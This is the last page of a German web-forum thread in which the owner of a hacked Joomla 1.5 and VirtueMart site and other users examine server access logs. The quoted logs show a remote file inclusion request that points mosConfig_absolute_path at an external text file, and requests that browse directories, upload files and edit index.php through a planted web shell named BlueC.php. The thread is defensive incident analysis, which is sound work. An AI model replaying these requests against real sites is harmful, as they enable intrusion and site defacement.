+ Antworten
Seite 4 von 4 ErsteErste 1 2 3 4
Ergebnis 31 bis 38 von 38

Thema: Joomla 1.5.9 bzw. 1.5.10 GEHACKT!

  1. #31
    Kommt häufiger vorbei Avatar von VollNormal
    Registriert seit
    03.08.2006
    Ort
    Bochum
    Beiträge
    337
    Bedankte sich
    6
    Erhielt 66 Danksagungen
    in 64 Beiträgen

    Standard

    Wieso beschuldigst du den Türken? Auffällig sind doch wohl eher diese drei Zeilen:
    Code:
    85.159.106.50 - - [10/Apr/2009:18:50:16 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 347 shop.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"
    [...]
    85.159.106.50 - - [10/Apr/2009:18:51:53 +0200] "GET /whr_shop//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 356 www.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"
    85.159.106.50 - - [10/Apr/2009:18:51:54 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ccm.pl/ccm/test.txt?? HTTP/1.1" 410 347 www.whitehorseranch.de "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "-"
    Tüssi, Andreas

    Vasuch macht kluch!

  2. #32
    Neu an Board
    Registriert seit
    19.10.2007
    Beiträge
    33
    Bedankte sich
    5
    1 Danksagung in 1 Beitrag

    Standard

    Weil der auch noch seinen Senf auf den anderen Seiten hinterlassen hat:
    By BeyazKurt | ALBANIAN C0der
    und auch die beiden files rt.php und BlueC.php mittels POST übertragen hat.

    Wobei obiger Auszug auch nicht ohne ist...

  3. #33
    Kommt häufiger vorbei Avatar von VollNormal
    Registriert seit
    03.08.2006
    Ort
    Bochum
    Beiträge
    337
    Bedankte sich
    6
    Erhielt 66 Danksagungen
    in 64 Beiträgen

    Standard

    Der albanische Kurt (wenn er es denn ist, die whois-Antwort deutet darauf hin, dass die IP dynamisch vergeben wird) hat tatsächlich auch was versucht ...

    Hiermit kann ich nichts anfangen, wäre mir aber verdächtig:
    Code:
    85.101.148.182 - - [10/Apr/2009:18:46:19 +0200] "GET /tinc?key=S9SR2slT HTTP/1.1" 200 1304 www.whitehorseranch.de "http://www.whitehorseranch.de/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
    Und so ein paar Sachen sind zwischendurch auch noch auffällig:
    Code:
    85.101.148.182 - - [10/Apr/2009:18:57:30 +0200] "GET /whr_shop/BlueC.php?act=upload&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates&sort=0a HTTP/1.1" 200 4068 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=ls&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fja_purity&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
    [...]
    85.101.148.182 - - [10/Apr/2009:18:57:52 +0200] "GET /whr_shop/BlueC.php?act=ls&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2F&sort=0a HTTP/1.1" 200 5007 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=upload&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates&sort=0a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
    [...]
    85.101.148.182 - - [10/Apr/2009:18:58:17 +0200] "POST /whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F HTTP/1.1" 200 7109 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
    [...]
    85.101.148.182 - - [10/Apr/2009:18:58:38 +0200] "POST /whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F HTTP/1.1" 200 7108 www.whitehorseranch.de "http://www.whitehorseranch.de/whr_shop/BlueC.php?act=f&f=index.php&ft=edit&d=%2Fhomepages%2F11%2Fd29432821%2Fhtdocs%2Fauskunft%2Fwhr%2Fwhr_shop%2Ftemplates%2Fnemesis%2F" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20" "-"
    Wobei - falls dieser Ansatz tatsächlich zum Erfolg geführt haben sollte, dann gehört den Programmierern der Erweiterungen gehörig auf die Finger geklopft. Weil sämtliche über das Netz eingehenden Daten sind grundsätzlich erstmal als verseucht anzunehmen.
    Tüssi, Andreas

    Vasuch macht kluch!

  4. #34
    Neu an Board
    Registriert seit
    19.10.2007
    Beiträge
    33
    Bedankte sich
    5
    1 Danksagung in 1 Beitrag

    Standard

    Der tinc?key verweist auf einen 1und1 internen shop.

    Das andere sind besagte Angriffe auf das Joomla (whr_shop).
    Fragt sich vorab nur, wie es ihm gelungen ist, die BlueC.php einzuschleusen ...

  5. #35
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Das Log ist zu jung. Dort sind nur die Aktivitäten zu sehen, die NACH der Ausnutzung einer Lücke stattgefunden haben. Nicht selten wird auch einfach per FTP eine Shell hochgeladen. Prüfe daher auch die FTP-Logs (Passwörter hast Du ja hoffentlich schon alle geändert)

  6. #36
    Neu an Board
    Registriert seit
    19.10.2007
    Beiträge
    33
    Bedankte sich
    5
    1 Danksagung in 1 Beitrag

    Standard Guter Hinweis ...

    Zitat Zitat von flotte Beitrag anzeigen
    Das Log ist zu jung. Dort sind nur die Aktivitäten zu sehen, die NACH der Ausnutzung einer Lücke stattgefunden haben. Nicht selten wird auch einfach per FTP eine Shell hochgeladen. Prüfe daher auch die FTP-Logs (Passwörter hast Du ja hoffentlich schon alle geändert)
    nur leider sind die Logs 15 und 16 nicht mehr auf dem Server 14(3.04.), 17 (24.04.) und 19 (8.05.) schon ..
    Der Bursche hat sie wohl gelöscht ...

    Passwörter sind nach deinem Hinweis sofort geändert worden!

    Irgendeine Idee, wie ich den Login-Schirm vom Backend wieder herkriege?
    Habe die System-Dateien von Joomla größtenteils von einer Sicherung zurückgespielt, kriege aber nur einen leeren Schirm.

    Habe ihn wieder! War nur eine leere index.htm davor! Kartoffel auf den Augen!
    Geändert von msit (15.05.2009 um 11:40 Uhr) Grund: Erledigt!

  7. #37
    Neu an Board
    Registriert seit
    29.06.2007
    Beiträge
    13
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

    Standard

    Zitat Zitat von flotte Beitrag anzeigen
    Das sind ziemlich uninteressante Informationen. Viel wichtiger ist ist: WIE wurde die Datei eingeschleust. Welche konkrete Lücke wurde in welcher Weise genutzt?
    Würde mich auch interessieren, da meine *.php und *.html auch aus diesem Netz ausgetauscht wurden.

    Bluesky

  8. #38
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Was soll das Crossposting? Bleib bitte bei Deinem Thread.

+ Antworten
Seite 4 von 4 ErsteErste 1 2 3 4

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein